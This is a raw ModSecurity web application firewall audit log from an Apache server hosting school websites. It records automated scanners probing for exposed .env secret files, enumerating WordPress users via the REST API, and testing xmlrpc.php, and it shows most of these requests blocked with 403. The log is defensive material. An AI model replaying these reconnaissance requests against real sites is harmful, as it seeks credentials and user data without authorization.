[rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746744946010209 939 (- - -) Stopwatch2: 1746744946010209 939; combined=337, p1=296, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c375b04-Z-- --66f83d63-A-- [09/May/2025:05:55:47 +0700] aB02cx6q_ZMebht3q15KwAAAAI8 103.236.140.4 58698 103.236.140.4 8181 --66f83d63-B-- GET /api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --66f83d63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66f83d63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746744947333669 700 (- - -) Stopwatch2: 1746744947333669 700; combined=262, p1=228, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66f83d63-Z-- --981ce519-A-- [09/May/2025:05:55:49 +0700] aB02dS-fAO47ojYKsMoMrwAAAE4 103.236.140.4 58700 103.236.140.4 8181 --981ce519-B-- GET /.env.save HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --981ce519-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --981ce519-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746744949415711 676 (- - -) Stopwatch2: 1746744949415711 676; combined=260, p1=224, p2=0, p3=0, p4=0, p5=36, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --981ce519-Z-- --139b7f0d-A-- [09/May/2025:05:55:52 +0700] aB02eB6q_ZMebht3q15KwQAAAJA 103.236.140.4 58702 103.236.140.4 8181 --139b7f0d-B-- GET /.env.prod HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --139b7f0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --139b7f0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746744952529234 818 (- - -) Stopwatch2: 1746744952529234 818; combined=304, p1=252, p2=0, p3=0, p4=0, p5=52, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --139b7f0d-Z-- --6f175707-A-- [09/May/2025:05:56:02 +0700] aB02glqQ1nOVx9fWpZS3hwAAAAA 103.236.140.4 58720 103.236.140.4 8181 --6f175707-B-- GET /dev/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6f175707-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f175707-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746744962064710 10525 (- - -) Stopwatch2: 1746744962064710 10525; combined=19786, p1=258, p2=0, p3=0, p4=0, p5=9781, sr=65, sw=0, l=0, gc=9747 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f175707-Z-- --f878c24d-A-- [09/May/2025:05:56:02 +0700] aB02glqQ1nOVx9fWpZS3iAAAAAM 103.236.140.4 58722 103.236.140.4 8181 --f878c24d-B-- GET /application/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f878c24d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f878c24d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746744962760646 844 (- - -) Stopwatch2: 1746744962760646 844; combined=320, p1=280, p2=0, p3=0, p4=0, p5=40, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f878c24d-Z-- --e8f59c11-A-- [09/May/2025:06:13:48 +0700] aB06rC-fAO47ojYKsMoOBAAAAEU 103.236.140.4 33038 103.236.140.4 8181 --e8f59c11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e8f59c11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8f59c11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746746028169318 3297 (- - -) Stopwatch2: 1746746028169318 3297; combined=1447, p1=459, p2=956, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8f59c11-Z-- --b5e2790f-A-- [09/May/2025:06:13:55 +0700] aB06sy-fAO47ojYKsMoOCgAAAE4 103.236.140.4 33068 103.236.140.4 8181 --b5e2790f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b5e2790f-C-- demo.sayHello --b5e2790f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5e2790f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746746035491594 6462 (- - -) Stopwatch2: 1746746035491594 6462; combined=4706, p1=598, p2=3865, p3=38, p4=43, p5=96, sr=77, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5e2790f-Z-- --b5e40763-A-- [09/May/2025:06:44:40 +0700] aB1B6FoC-7ITMWTA_c93AwAAAM0 103.236.140.4 45222 103.236.140.4 8181 --b5e40763-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b5e40763-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5e40763-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746747880340549 3089 (- - -) Stopwatch2: 1746747880340549 3089; combined=1318, p1=468, p2=812, p3=0, p4=0, p5=38, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5e40763-Z-- --20d5ea1b-A-- [09/May/2025:06:44:46 +0700] aB1B7loC-7ITMWTA_c93EgAAANA 103.236.140.4 45282 103.236.140.4 8181 --20d5ea1b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20d5ea1b-C-- demo.sayHello --20d5ea1b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20d5ea1b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746747886308825 7064 (- - -) Stopwatch2: 1746747886308825 7064; combined=5038, p1=622, p2=4131, p3=39, p4=46, p5=116, sr=75, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20d5ea1b-Z-- --7220f57b-A-- [09/May/2025:06:45:53 +0700] aB1CMS-fAO47ojYKsMoRXAAAAEU 103.236.140.4 45920 103.236.140.4 8181 --7220f57b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7220f57b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7220f57b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746747953882457 2306 (- - -) Stopwatch2: 1746747953882457 2306; combined=1267, p1=399, p2=839, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7220f57b-Z-- --e383504c-A-- [09/May/2025:06:46:01 +0700] aB1COR6q_ZMebht3q15ONgAAAJU 103.236.140.4 45990 103.236.140.4 8181 --e383504c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.196 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e383504c-C-- demo.sayHello --e383504c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e383504c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746747961683294 6764 (- - -) Stopwatch2: 1746747961683294 6764; combined=4955, p1=591, p2=4107, p3=38, p4=42, p5=103, sr=74, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e383504c-Z-- --41853c13-A-- [09/May/2025:06:46:39 +0700] aB1CXx6q_ZMebht3q15OUwAAAIQ 103.236.140.4 46346 103.236.140.4 8181 --41853c13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --41853c13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41853c13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746747999268158 2861 (- - -) Stopwatch2: 1746747999268158 2861; combined=1332, p1=470, p2=833, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41853c13-Z-- --313e6d4a-A-- [09/May/2025:06:46:49 +0700] aB1CaVqQ1nOVx9fWpZS7mAAAAA8 103.236.140.4 46438 103.236.140.4 8181 --313e6d4a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --313e6d4a-C-- demo.sayHello --313e6d4a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --313e6d4a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746748009539098 6208 (- - -) Stopwatch2: 1746748009539098 6208; combined=4525, p1=634, p2=3654, p3=31, p4=35, p5=100, sr=128, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --313e6d4a-Z-- --ee230f56-A-- [09/May/2025:06:49:09 +0700] aB1C9VoC-7ITMWTA_c93qQAAAM8 103.236.140.4 47716 103.236.140.4 8181 --ee230f56-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.89.107.241 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.89.107.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ee230f56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee230f56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746748149214253 824 (- - -) Stopwatch2: 1746748149214253 824; combined=335, p1=282, p2=0, p3=0, p4=0, p5=52, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee230f56-Z-- --d8ccf723-A-- [09/May/2025:07:28:29 +0700] aB1MLS-fAO47ojYKsMoX4wAAAE8 103.236.140.4 41644 103.236.140.4 8181 --d8ccf723-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d8ccf723-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8ccf723-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746750509282534 2538 (- - -) Stopwatch2: 1746750509282534 2538; combined=1263, p1=408, p2=825, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8ccf723-Z-- --bc54d82a-A-- [09/May/2025:07:28:34 +0700] aB1MMloC-7ITMWTA_c96-AAAAMQ 103.236.140.4 41696 103.236.140.4 8181 --bc54d82a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bc54d82a-C-- demo.sayHello --bc54d82a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc54d82a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746750514544142 5810 (- - -) Stopwatch2: 1746750514544142 5810; combined=4315, p1=547, p2=3541, p3=32, p4=35, p5=95, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc54d82a-Z-- --8d3db079-A-- [09/May/2025:07:28:35 +0700] aB1MM1oC-7ITMWTA_c96-wAAAMk 103.236.140.4 41706 103.236.140.4 8181 --8d3db079-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8d3db079-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d3db079-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746750515355367 2803 (- - -) Stopwatch2: 1746750515355367 2803; combined=1252, p1=429, p2=794, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d3db079-Z-- --891bca6e-A-- [09/May/2025:07:28:44 +0700] aB1MPFoC-7ITMWTA_c97CgAAAM0 103.236.140.4 41792 103.236.140.4 8181 --891bca6e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.55 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --891bca6e-C-- demo.sayHello --891bca6e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php 